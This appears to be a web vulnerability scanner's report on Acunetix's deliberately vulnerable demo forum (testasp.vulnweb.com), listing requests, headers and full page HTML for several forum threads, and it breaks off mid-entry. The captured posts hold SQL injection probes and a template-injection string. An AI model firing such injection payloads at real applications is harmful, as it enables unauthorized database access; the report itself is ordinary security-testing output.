<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+998-998) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=68 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4148 |
Response Body - size: 4,148 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:18 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 2+689-689-1=0+0+0+1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=69 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4148 |
Response Body - size: 4,148 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+689-689-1=0+0+0+1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4230 |
Response Body - size: 4,230 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=70 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4146 |
Response Body - size: 4,146 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+689-689)</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=71 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4146 |
Response Body - size: 4,146 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+689-689)</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=72 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=73 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
